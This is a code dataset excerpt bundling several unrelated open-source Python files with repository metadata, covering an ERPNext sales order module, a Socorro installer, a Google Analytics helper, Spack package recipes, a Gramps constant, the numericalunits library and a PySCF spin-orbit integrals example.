def set_missing_values(source, target):
target.is_pos = 0
target.ignore_pricing_rule = 1
target.run_method("set_missing_values")
target.run_method("calculate_taxes_and_totals")
def update_item(source, target, source_parent):
target.amount = flt(source.amount) - flt(source.billed_amt)
target.base_amount = target.amount * flt(source_parent.conversion_rate)
target.qty = source.rate and target.amount / flt(source.rate) or source.qty
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Sales Invoice",
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Sales Invoice Item",
"field_map": {
"name": "so_detail",
"parent": "sales_order",
},
"postprocess": update_item,
"condition": lambda doc: doc.base_amount==0 or doc.billed_amt < doc.amount
},
"Sales Taxes and Charges": {
"doctype": "Sales Taxes and Charges",
"add_if_empty": True
},
"Sales Team": {
"doctype": "Sales Team",
"add_if_empty": True
}
}, target_doc, postprocess)
def set_advance_vouchers(source, target):
advance_voucher_list = []
advance_voucher = frappe.db.sql("""
select
t1.name as voucher_no, t1.posting_date, t1.remark, t2.account,
t2.name as voucher_detail_no, {amount_query} as payment_amount, t2.is_advance
from
`tabJournal Voucher` t1, `tabJournal Voucher Detail` t2
""")
return doclist
@frappe.whitelist()
def make_maintenance_schedule(source_name, target_doc=None):
maint_schedule = frappe.db.sql("""select t1.name
from `tabMaintenance Schedule` t1, `tabMaintenance Schedule Item` t2
where t2.parent=t1.name and t2.prevdoc_docname=%s and t1.docstatus=1""", source_name)
if not maint_schedule:
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Maintenance Schedule",
"field_map": {
"name": "sales_order_no"
},
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Maintenance Schedule Item",
"field_map": {
"parent": "prevdoc_docname"
},
"add_if_empty": True
}
}, target_doc)
return doclist
@frappe.whitelist()
def make_maintenance_visit(source_name, target_doc=None):
visit = frappe.db.sql("""select t1.name
from `tabMaintenance Visit` t1, `tabMaintenance Visit Purpose` t2
where t2.parent=t1.name and t2.prevdoc_docname=%s
and t1.docstatus=1 and t1.completion_status='Fully Completed'""", source_name)
if not visit:
doclist = get_mapped_doc("Sales Order", source_name, {
"Sales Order": {
"doctype": "Maintenance Visit",
"field_map": {
"name": "sales_order_no"
},
"validation": {
"docstatus": ["=", 1]
}
},
"Sales Order Item": {
"doctype": "Maintenance Visit Purpose",
"field_map": {
"parent": "prevdoc_docname",
"parenttype": "prevdoc_doctype"
},
"add_if_empty": True
}
}, target_doc)
return doclist
|
indictranstech/focal-erpnext
|
selling/doctype/sales_order/sales_order.py
|
Python
|
agpl-3.0
| 20,315
|
[
"VisIt"
] |
7b3ef017ee92f0865b76a7ab44cacc523f5da7e5c85c5109c8f73429911f7a6a
|
#!/usr/bin/env python
import functools
import getpass
import sys
import subprocess
import urllib2
import json
import os
import re
import webbrowser
import zipfile
import threading
import time
from contextlib import contextmanager
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = "\033[1m"
class InstallationError(Exception):
pass
@contextmanager
def pushd(dir):
old_dir = os.getcwd()
os.chdir(dir)
try:
yield
finally:
os.chdir(old_dir)
def can_import(name):
try:
__import__(name)
except ImportError:
return False
else:
return True
def cmd_exists(cmd):
return subprocess.call("type " + cmd, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0
STEPS = []
def step(msg):
def _decorator(f):
@functools.wraps(f)
def _wrapper(ctx):
i = STEPS.index(_wrapper)
print("\n" + BOLD + "STEP {0}".format(i + 1) + ENDC + "\n" + msg +
"\n")
if ctx["_step_num"] >= i:
print("... already done!")
else:
f(ctx)
ctx["_step_num"] = i
STEPS.append(_wrapper)
return _wrapper
return _decorator
def status(s):
sys.stdout.write(" " + s + " ")
sys.stdout.flush()
def ok():
print(OKGREEN + "OK" + ENDC)
def fail():
print(FAIL + "FAILED" + ENDC)
def check_prerequisites(preds):
vals = {}
for name, pred in preds:
status("{0}:".format(name))
if pred():
ok()
vals[name] = True
else:
fail()
vals[name] = False
return vals
@step("Checking for prerequisites...")
def step1(ctx):
reqs = check_prerequisites([
("python >= 2.6", lambda: sys.version_info >= (2, 6)),
("virtualenv", functools.partial(cmd_exists, "virtualenv")),
("svn", functools.partial(cmd_exists, "svn")),
("rsync", functools.partial(cmd_exists, "rsync")),
("git", functools.partial(cmd_exists, "git")),
("hg", functools.partial(cmd_exists, "hg"))
])
if not all(reqs.itervalues()):
raise InstallationError("""\
Missing prerequisites.
Please ensure you have all of the above prerequisites installed.
""")
@step("Fetching Socorro...")
def step2(ctx):
ctx["dir"] = raw_input(" Specify a directory to install Socorro in [~/socorro]: ") or \
os.path.expanduser("~/socorro")
while not os.path.exists(ctx["dir"]):
if (raw_input(" Destination path does not exist, create it? [Y/n]: ") or \
"y").lower() == "y":
print("")
status("Creating installation directory...")
try:
os.makedirs(ctx["dir"])
except Exception as e:
fail()
raise InstallationError(e)
ok()
else:
fail()
tags = json.load(urllib2.urlopen("https://api.github.com/repos/mozilla/socorro/tags"))
tag_numbers = []
for i, tag in enumerate(tags):
try:
tag_numbers.append((tuple(map(int, tag["name"].lstrip("v").split("."))), tag["name"]))
except ValueError:
pass
tag_numbers.sort()
_, latest_release_tag = tag_numbers[-1]
status("Downloading Socorro {0}...".format(latest_release_tag))
print("")
if subprocess.call(["git", "clone", "--branch", latest_release_tag,
"--depth", "1", "https://github.com/mozilla/socorro",
ctx["dir"]]) != 0:
raise InstallationError("""\
Git error.
""")
@step("Installing minidump_stackwalk...")
def step3(ctx):
with pushd(ctx["dir"]):
if subprocess.call(["make", "minidump_stackwalk"]) != 0:
raise InstallationError("""\
Could not install minidump_stackwalk.
Please check out the console output for error details.
""")
@step("Updating submodules...")
def step4(ctx):
with pushd(ctx["dir"]):
if subprocess.call(["git", "submodule", "init"]) != 0 or \
subprocess.call(["git", "submodule", "update"]) != 0:
raise InstallationError("""\
Could not update submodules.
Please check out the console output for error details.
""")
@step("Bootstrapping Socorro environment...")
def step5(ctx):
with pushd(ctx["dir"]):
if subprocess.call(["make", "bootstrap"]) != 0:
raise InstallationError("""\
Could not bootstrap.
Please check out the console output for error details.
""")
def load_socorro_virtualenv(ctx):
execfile(os.path.join(ctx["dir"], "socorro-virtualenv", "bin",
"activate_this.py"), {
"__file__": os.path.join(ctx["dir"], "socorro-virtualenv", "bin",
"activate_this.py")
})
@step("Checking for PostgreSQL...")
def step6(ctx):
ctx["host"] = raw_input(" PostgreSQL host [localhost]: ") or \
"localhost"
ctx["database"] = raw_input(" PostgreSQL database [breakpad]: ") or \
"breakpad"
default_username = getpass.getuser()
ctx["username"] = raw_input(" PostgreSQL username [{0}]: ".format(default_username)) or \
default_username
ctx["password"] = getpass.getpass(" PostgreSQL password (will not be echoed): ")
print("")
load_socorro_virtualenv(ctx)
import psycopg2
status("Connecting to PostgreSQL server...")
try:
conn = psycopg2.connect(database=ctx["database"], user=ctx["username"],
password=ctx["password"], host=ctx["host"])
except Exception as e:
fail()
raise InstallationError(e)
conn.close()
ok()
@step("Checking for PostgreSQL requirements...")
def step7(ctx):
load_socorro_virtualenv(ctx)
import psycopg2
conn = psycopg2.connect(database=ctx["database"], user=ctx["username"],
password=ctx["password"], host=ctx["host"])
cur = conn.cursor()
cur.execute("SHOW TIMEZONE")
tz, = cur.fetchone()
status("Checking if time zone is UTC...")
if tz != "UTC":
fail()
raise InstallationError("""\
PostgreSQL time zone is not UTC.
Please edit your postgresql.conf file and set:
timezone = 'UTC'
""")
ok()
status("Checking if JSON enhancements are available...")
cur.execute("SELECT version()")
version_number = re.match(r"^PostgreSQL (\d+)\.(\d+).*", cur.fetchone()[0])
version_number = version_number.group(1), version_number.group(2)
# NOTE: Socorro doesn't work on PostgreSQL 9.3 yet.
if version_number < (9, 3):
cur.execute("SELECT * FROM pg_available_extensions WHERE name='json_enhancements'")
if cur.fetchone() is None:
fail()
raise InstallationError("""\
PostgreSQL JSON enhancements are not available.
Please run, in your Socorro checkout:
make json_enhancements_pg_extension
""")
conn.close()
ok()
@step("Setting up PostgreSQL database...")
def step8(ctx):
load_socorro_virtualenv(ctx)
try:
os.rename(os.path.join(ctx["dir"], "config", "alembic.ini-dist"),
os.path.join(ctx["dir"], "config", "alembic.ini"))
except OSError:
pass
with pushd(ctx["dir"]):
if subprocess.call(["python",
"-m",
"socorro.external.postgresql.setupdb_app",
"--dropdb",
"--database_name", ctx["database"],
"--database_superusername", ctx["username"],
"--database_superuserpassword", ctx["password"],
"--database_hostname", ctx["host"]]) != 0:
raise InstallationError("""\
Could not run setupdb_app.
Please check out the console output for error details.
""")
import psycopg2
conn = psycopg2.connect(database=ctx["database"], user=ctx["username"],
password=ctx["password"], host=ctx["host"])
status("Setting up roles...")
cur = conn.cursor()
with open(os.path.join(ctx["dir"], "sql", "roles.sql")) as f:
cur.executemany(f.read(), [])
conn.close()
ok()
@step("Installing configurator dependencies...")
def step9(ctx):
load_socorro_virtualenv(ctx)
if subprocess.call(["pip", "install", "-r", "requirements.txt"]) != 0:
raise InstallationError("""\
Could not install configurator dependencies.
Please check out the console output for error details.
""")
@step("Configuring Socorro...")
def step10(ctx):
load_socorro_virtualenv(ctx)
zf = zipfile.ZipFile("config.zip", "w")
for root, dirs, files in os.walk("config"):
for fn in files:
path = os.path.join(root, fn)
with open(path, "r") as f:
zf.writestr(os.path.relpath(path, "config"),
f.read()
.replace("{{DATABASE_NAME}}", ctx["database"])
.replace("{{DATABASE_HOST}}", ctx["host"])
.replace("{{DATABASE_USER}}", ctx["username"])
.replace("{{DATABASE_PASSWORD}}", ctx["password"]))
zf.close()
sys.path.insert(0, ctx["dir"])
os.environ["SOCORRO_PATH"] = os.path.join(ctx["dir"], "socorro")
# XXX: socorromatic does analysis on import, which is kind of disgusting
from socorromatic import app
class ServerThread(threading.Thread):
daemon = True
def run(self):
app.run(debug=True, use_reloader=False)
ServerThread().start()
time.sleep(1)
webbrowser.open("http://localhost:5000")
raw_input("Press enter when configuration is complete...")
status("Requesting for configurator to shut down...")
req = urllib2.Request("http://localhost:5000/_shutdown", "")
urllib2.urlopen(req).read()
ok()
zf = zipfile.ZipFile("config.zip", "r")
config_dir = os.path.join(ctx["dir"], "config")
status("Extracting configuration files to {0}...".format(config_dir))
zf.extractall(config_dir)
zf.close()
ok()
def _main():
print("""\
""" + BOLD + "SOCORROMATIC" + ENDC + """
Welcome to the Socorro installer. This script will guide you through the steps
of installing Socorro on this node. \
""")
if os.path.exists("socorromatic-state.json"):
with open("socorromatic-state.json", "r") as f:
ctx = json.load(f)
else:
ctx = {
"_step_num": -1
}
try:
for step in STEPS:
step(ctx)
except InstallationError as e:
print("\nInstallation was aborted due to a fatal error:\n\n {0}".format(e))
sys.exit(1)
finally:
with open("socorromatic-state.json", "w") as f:
json.dump(ctx, f)
print("\nInstallation finished!")
if (raw_input("Would you like to delete the installer state file? [Y/n]: ") or "y").lower() == "y":
os.unlink("socorromatic-state.json")
print("""
Socorro has been successfully installed to: {0}
For further information on the installation process, as well as running
your new Socorro cluster, please visit:
http://socorro.readthedocs.org/en/latest/installation.html
""".format(ctx["dir"]))
if __name__ == "__main__":
_main()
|
rfw/socorromatic
|
installer.py
|
Python
|
mpl-2.0
| 11,431
|
[
"VisIt"
] |
4767f50a65c110589356d37162a32ebb89c9ed3b398fe16c048bda14bb775051
|
from typing import Optional
from backend.common.run_after_response import run_after_response
class GoogleAnalytics:
"""
Class that manages sending information to Google Analytics
For more information about GAnalytics Protocol Parameters, visit
https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters
"""
@classmethod
def track_event(
cls,
client_id: str,
event_category: str,
event_action: str,
event_label: Optional[str] = None,
event_value: Optional[int] = None,
run_after: bool = False,
) -> None:
from backend.common.sitevars.google_analytics_id import GoogleAnalyticsID
google_analytics_id = GoogleAnalyticsID.google_analytics_id()
if not google_analytics_id:
import logging
logging.warning(
"Missing sitevar: google_analytics.id. Can't track API usage."
)
return
import uuid
cid = uuid.uuid3(uuid.NAMESPACE_X500, str(client_id))
params = {
"v": 1,
"tid": google_analytics_id,
"cid": str(cid),
"t": "event",
"ec": event_category,
"ea": event_action,
"cd1": client_id, # custom dimension 1 is the raw client ID
"ni": 1,
"sc": "end", # forces tracking session to end
}
if event_label:
params["el"] = event_label
if event_value:
params["ev"] = event_value
def make_request():
import requests
requests.get(
"https://www.google-analytics.com/collect", params=params, timeout=10
)
if run_after:
run_after_response(make_request)
else:
make_request()
|
the-blue-alliance/the-blue-alliance
|
src/backend/common/google_analytics.py
|
Python
|
mit
| 1,848
|
[
"VisIt"
] |
c099e68b2fc25acbcef668ac008e768f380b97cd557103f0a225a330a5a03eea
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RSpem(RPackage):
"""This package can optimize the parameter in S-system models given time
series data"""
homepage = "https://bioconductor.org/packages/SPEM/"
git = "https://git.bioconductor.org/packages/SPEM.git"
version('1.18.0', commit='3ab425dd9889885eac328d26b73366a875cd250b')
depends_on('r-rsolnp', type=('build', 'run'))
depends_on('r-biobase', type=('build', 'run'))
depends_on('r@3.4.3:3.4.9', when='@1.18.0')
|
mfherbst/spack
|
var/spack/repos/builtin/packages/r-spem/package.py
|
Python
|
lgpl-2.1
| 1,722
|
[
"Bioconductor"
] |
409ea052fd0be0a581c2f530f462629d63be0ea9014331e9cf3278b7e985fccd
|
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2009 Brian G. Matherly
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#------------------------------------------------------------------------
#
# python modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Gramps modules
#
#------------------------------------------------------------------------
#------------------------------------------------------------------------
#
# Public Constants
#
#------------------------------------------------------------------------
GRAMPS_XML_VERSION_TUPLE = (1, 7, 1) # version for Gramps 4.2
GRAMPS_XML_VERSION = '.'.join(str(i) for i in GRAMPS_XML_VERSION_TUPLE)
|
SNoiraud/gramps
|
gramps/plugins/lib/libgrampsxml.py
|
Python
|
gpl-2.0
| 1,447
|
[
"Brian"
] |
7551143b5d685c57d9839c3ff81193ed92060fce2aa9816db7b0076abab9cccd
|
# -*- coding: utf-8 -*-
"""
For information and usage see README, or http://pypi.python.org/pypi/numericalunits
"""
#Copyright (C) 2012 Steven Byrnes
#
#Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from math import pi
import random
__version__ = 1.13
def reset_units(seed=None):
"""
Set all units to new, self-consistent, floating-point values. See package
documentation for detailed explanation and examples:
http://pypi.python.org/pypi/numericalunits
reset_units() --> units are randomized. This is the suggested use. Run this
before your calculation, display the final answer, then re-run this, then
re-disply the final answer. If you get the same answers both times, then
your calculations are almost guaranteed to be free of
dimensional-analysis-violating errors. reset_units() is run automatically
the first time this module is imported.
reset_units('SI') --> Set units so that all values are given in standard SI
units (meters-kilograms-seconds) by default. In this mode, there is no way
to test for dimensional-analysis-violating errors.
reset_units(x) --> If you pass any other argument x, it's used as the seed
for the random number generator.
"""
global m, kg, s, C, K
if seed == 'SI':
m = 1.
kg = 1.
s = 1.
C = 1.
K = 1.
else:
prior_random_state = random.getstate()
if seed is None:
random.seed()
else:
random.seed(seed)
m = 10. ** random.uniform(-1,1) #meter
kg = 10. ** random.uniform(-1,1) #kilogram
s = 10. ** random.uniform(-1,1) #second
C = 10. ** random.uniform(-1,1) # coulombs
K = 10. ** random.uniform(-1,1) # kelvins
# Leave the random generator like I found it, in case something else is
# using it.
random.setstate(prior_random_state)
set_derived_units_and_constants()
return
def set_derived_units_and_constants():
"""
Assuming that the base units (m, kg, s, C, K) have already been set as
floating-point values, this function sets all other units and constants
to the appropriate, self-consistent values.
"""
# Length
global cm, mm, um, nm, pm, fm, km, angstrom, lightyear, \
astro_unit, pc, kpc, Mpc, Gpc, inch, foot, mile, thou
cm = 1e-2 * m
mm = 1e-3 * m
um = 1e-6 * m
nm = 1e-9 * m
pm = 1e-12 * m
fm = 1e-15 * m
km = 1e3 * m
angstrom = 1e-10 * m
lightyear = 9460730472580800. * m
astro_unit = 149597870700. * m #astronomical unit
pc = (648000./pi) * astro_unit; #parsec
kpc = 1e3 * pc
Mpc = 1e6 * pc
Gpc = 1e9 * pc
inch = 2.54 * cm
foot = 12. * inch
mile = 5280. * foot
thou = 1e-3 * inch #thousandth of an inch; also called mil
# Volume
global L, mL, uL, nL, pL, fL, aL, kL, ML, GL
L = 1e-3 * m**3 #liter
mL = 1e-3 * L
uL = 1e-6 * L
nL = 1e-9 * L
pL = 1e-12 * L
fL = 1e-15 * L
aL = 1e-18 * L
kL = 1e3 * L
ML = 1e6 * L
GL = 1e9 * L
# Time
global ms, us, ns, ps, fs, minute, hour, day, week, year
ms = 1e-3 * s
us = 1e-6 * s
ns = 1e-9 * s
ps = 1e-12 * s
fs = 1e-15 * s
minute = 60. * s
hour = 60. * minute
day = 24. * hour #solar day
week = 7. * day
year = 365.256363004 * day #sidereal year
# Frequency
global Hz, mHz, kHz, MHz, GHz, THz, PHz
Hz = 1./s
mHz = 1e-3 * Hz
kHz = 1e3 * Hz
MHz = 1e6 * Hz
GHz = 1e9 * Hz
THz = 1e12 * Hz
PHz = 1e15 * Hz
# Mass
global g, mg, ug, ng, pg, fg, tonne, amu, Da, kDa, lbm
g = 1e-3 * kg
mg = 1e-3 * g
ug = 1e-6 * g
ng = 1e-9 * g
pg = 1e-12 * g
fg = 1e-15 * g
tonne = 1e3 * kg
amu = 1.660538921e-27 * kg #atomic mass unit
Da = amu #Dalton
kDa = 1e3 * Da
lbm = 0.45359237 * kg # pound mass (international avoirdupois pound)
# Energy
global J, mJ, uJ, nJ, pJ, fJ, kJ, MJ, GJ, erg, eV, meV, keV, MeV, GeV, \
TeV, btu, smallcal, kcal, Wh, kWh
J = (kg * m**2)/s**2
mJ = 1e-3 * J
uJ = 1e-6 * J
nJ = 1e-9 * J
pJ = 1e-12 * J
fJ = 1e-15 * J
kJ = 1e3 * J
MJ = 1e6 * J
GJ = 1e9 * J
erg = 1e-7 * J
eV = 1.602176565e-19 * J
meV = 1e-3 * eV
keV = 1e3 * eV
MeV = 1e6 * eV
GeV = 1e9 * eV
TeV = 1e12 * eV
btu = 1055.056 * J #British thermal unit
smallcal = 4.184 * J #small calorie ("gram calorie")
kcal = 4184. * J #kilocalorie ("large Calorie", "dietary Calorie")
Wh = 3600. * J #watt-hour
kWh = 1e3 * Wh # kilowatt-hour
# Moles, concentration / molarity
global NA, mol, mmol, umol, nmol, pmol, fmol, M, mM, uM, nM, pM, fM
NA = 6.02214129e23 #Avogadro's number
mol = NA #1 mole (see README)
mmol = 1e-3 * mol
umol = 1e-6 * mol
nmol = 1e-9 * mol
pmol = 1e-12 * mol
fmol = 1e-15 * mol
M = mol/L # molar
mM = 1e-3 * M
uM = 1e-6 * M
nM = 1e-9 * M
pM = 1e-12 * M
fM = 1e-15 * M
# Force
global N, dyn, lbf
N = (kg * m)/s**2 #newton
dyn = 1e-5 * N #dyne
lbf = 4.4482216152605 * N #pound-force (international avoirdupois pound)
# Pressure
global Pa, hPa, kPa, MPa, GPa, bar, mbar, cbar, dbar, kbar, Mbar, atm, \
torr, mtorr, psi
Pa = N/m**2 #pascal
hPa = 1e2 * Pa #hectopascal
kPa = 1e3 * Pa
MPa = 1e6 * Pa
GPa = 1e9 * Pa
bar = 1e5 * Pa
mbar = 1e-3 * bar
cbar = 1e-2 * bar #centibar
dbar = 0.1 * bar #decibar
kbar = 1e3 * bar
Mbar = 1e6 * bar
atm = 101325. * Pa
torr = (1./760.) * atm
mtorr = 1e-3 * torr
psi = lbf / inch**2
# Power
global W, mW, uW, nW, pW, kW, MW, GW, TW
W = J/s
mW = 1e-3 * W
uW = 1e-6 * W
nW = 1e-9 * W
pW = 1e-12 * W
kW = 1e3 * W
MW = 1e6 * W
GW = 1e9 * W
TW = 1e12 * W
# Temperature
global degFinterval, degCinterval
degFinterval = (5./9.) * K # A temperature difference in degrees Fahrenheit
degCinterval = K # A temperature difference in degrees Celsius
# Charge
global mC, uC, nC, Ah, mAh
mC = 1e-3 * C
uC = 1e-6 * C
nC = 1e-9 * C
Ah = 3600. * C #amp-hour
mAh = 1e-3 * Ah
# Current
global A, mA, uA, nA, pA, fA
A = C/s
mA = 1e-3 * A
uA = 1e-6 * A
nA = 1e-9 * A
pA = 1e-12 * A
fA = 1e-15 * A
# Voltage
global V, mV, uV, nV, kV, MV, GV, TV
V = J/C
mV = 1e-3 * V
uV = 1e-6 * V
nV = 1e-9 * V
kV = 1e3 * V
MV = 1e6 * V
GV = 1e9 * V
TV = 1e12 * V
# Resistance and conductivity
global ohm, mohm, kohm, Mohm, Gohm, S, mS, uS, nS
ohm = V / A
mohm = 1e-3 * ohm
kohm = 1e3 * ohm
Mohm = 1e6 * ohm
Gohm = 1e9 * ohm
S = 1./ohm #siemens
mS = 1e-3 * S
uS = 1e-6 * S
nS = 1e-9 * S
# Magnetic fields and fluxes
global T, mT, uT, nT, G, mG, uG, kG, Oe, Wb
T = (V * s) / m**2 #tesla
mT = 1e-3 * T
uT = 1e-6 * T
nT = 1e-9 * T
G = 1e-4 * T #gauss
mG = 1e-3 * G
uG = 1e-6 * G
kG = 1e3 * G
Oe = (1000./(4.*pi)) * A/m #oersted
Wb = J/A #weber
# Capacitance and inductance
global F, uF, nF, pF, fF, aF, H, mH, uH, nH
F = C / V #farad
uF = 1e-6 * F
nF = 1e-9 * F
pF = 1e-12 * F
fF = 1e-15 * F
aF = 1e-18 * F
H = m**2 * kg / C**2 #henry
mH = 1e-3 * H
uH = 1e-6 * H
nH = 1e-9 * H
#Constants--general
global c0, mu0, eps0, Z0, hPlanck, hbar, kB, GNewton, sigmaSB, alphaFS
c0 = 299792458. * m/s #speed of light in vacuum
mu0 = 4. * pi * 1e-7 * N/A**2 #magnetic constant, permeability of vacuum
eps0 = 1./(mu0 * c0**2) #electric constant, permittivity of vacuum
Z0 = mu0 * c0 #vacuum impedance, 377 ohms
hPlanck = 6.62606957e-34 * J*s #planck constant
hbar = hPlanck / (2.*pi) #reduced planck constant
kB = 1.3806488e-23 * J/K #Boltzmann constant
GNewton = 6.67384e-11 * m**3 / (kg * s**2) #Gravitational constant
sigmaSB = 5.670373e-8 * W / (m**2 * K**4) #Stefan-Boltzmann constant
alphaFS = 7.2973525698e-3 #fine-structure constant
#Constants--chemistry, atomic physics, electrons
global Rgas, e, uBohr, uNuc, aBohr, me, mp, mn, Rinf, Ry, \
ARichardson, Phi0, KJos, RKlitz
Rgas = kB #ideal gas constant (see README)
e = 1.602176565e-19 * C #charge of proton
uBohr = 9.27400968e-24 * J/T #Bohr magneton
uNuc = 5.05078353e-27 * J/T #nuclear magneton
aBohr = 0.52917721092e-10 * m #Bohr radius
me = 9.10938291e-31 * kg #electron mass
mp = 1.672621777e-27 * kg #proton mass
mn = 1.674927351e-27 * kg #neutron mass
Rinf = 10973731.568539 / m #Rydberg constant
Ry = 2.179872171e-18 * J #Rydberg energy, approximately 13.6 eV
ARichardson = (4.*pi*e*me*kB**2) / hPlanck**3 #Richardson constant
Phi0 = 2.067833758e-15 * Wb #magnetic flux quantum
KJos = 4.83597870e14 * Hz / V #Josephson constant
RKlitz = 2.58128074434e4 * ohm #von Klitzing constant
#Constants--astronomical and properties of earth
global REarth, g0, Msolar, MEarth
REarth = 6371. * km #radius of earth
g0 = 9.80665 * m / s**2 #standard earth gravitational acceleration
Msolar = 1.98892e30 * kg #mass of the sun
MEarth = 5.9736e24 * kg #mass of earth
# Set units randomly when this module is initialized. (Don't worry: If the
# module is imported many times from many places, this command will only
# execute during the first import.)
reset_units()
if False: #workaround so that Spyder IDE recognizes these variables as globals
m=1
kg=1
s=1
K=1
C=1
|
schoolie/numericalunits
|
numericalunits.py
|
Python
|
mit
| 10,760
|
[
"Avogadro",
"Dalton"
] |
0c122dcadd2ce10630a4c94329a6f124aea195f385a20d5be37ce04d67adc73e
|
#!/usr/bin/env python
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Integrals for spin-orbit coupling
See also functions make_h1_soc, direct_spin_spin in pyscf/prop/zfs/uhf.py
'''
import numpy
from pyscf import gto
from pyscf import lib
mol = gto.M(
verbose = 0,
atom = 'C 0 0 0; O 0 0 1.5',
basis = 'ccpvdz'
)
# J Chem Phys, 122, 034107, Eq (2)
mat = 0
for atm_id in range(mol.natm):
mol.set_rinv_orig(mol.atom_coord(atm_id))
chg = mol.atom_charge(atm_id)
mat -= chg * mol.intor('int1e_prinvxp_sph')
# J Chem Phys, 122, 034107, Eq (3)
mat = mol.intor('int2e_p1vxp1_sph') # (3,n*n,n*n) array, 3 for x,y,z components
# spin-spin dipole-dipole coupling integrals
# Chem Phys 279, 133, Eq (1)
def ss(mol):
n = mol.nao_nr()
mat1 = mol.intor('int2e_ip1ip2_sph').reshape(3,3,n,n,n,n) # <nabla1 nabla2 | 1 2>
mat2 =-mat1.transpose(0,1,2,3,5,4) # <nabla1 2 | 1 nabla2>
mat3 =-mat2.transpose(1,0,3,2,4,5) # <1 nabla2 | nabla1 2>
mat4 = mat1.transpose(0,1,3,2,5,4) # <1 2 | nabla1 nabla2>
mat = mat1 - mat2 - mat3 + mat4
# Fermi contact term
h_fc = mol.intor('int4c1e').reshape(nao,nao,nao,nao) * (4*numpy.pi/3)
mat[0,0] -= h_fc
mat[1,1] -= h_fc
mat[2,2] -= h_fc
s = lib.PauliMatrices * .5
# wxyz are the spin indices, ijkl are the AO indicies
alpha = 137.036
fac = alpha ** 2 / 2
mat = numpy.einsum('swx,tyz,stijkl->wxyzijkl', s[:,0,0], s[:,0,0], mat) * fac
return mat
|
gkc1000/pyscf
|
examples/gto/20-soc_ao_integrals.py
|
Python
|
apache-2.0
| 1,462
|
[
"PySCF"
] |
b29a2ef02094a1836725ad4c3c3f399f544c80c50894a657dc83048bef9fb05d
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyPhonopy(PythonPackage):
"""Phonopy is an open source package for phonon
calculations at harmonic and quasi-harmonic levels."""
homepage = "http://atztogo.github.io/phonopy/index.html"
url = "http://sourceforge.net/projects/phonopy/files/phonopy/phonopy-1.10/phonopy-1.10.0.tar.gz"
version('1.10.0', '973ed1bcea46e21b9bf747aab9061ff6')
depends_on('py-numpy', type=('build', 'run'))
depends_on('py-scipy', type=('build', 'run'))
depends_on('py-matplotlib', type=('build', 'run'))
depends_on('py-pyyaml', type=('build', 'run'))
|
krafczyk/spack
|
var/spack/repos/builtin/packages/py-phonopy/package.py
|
Python
|
lgpl-2.1
| 1,833
|
[
"phonopy"
] |
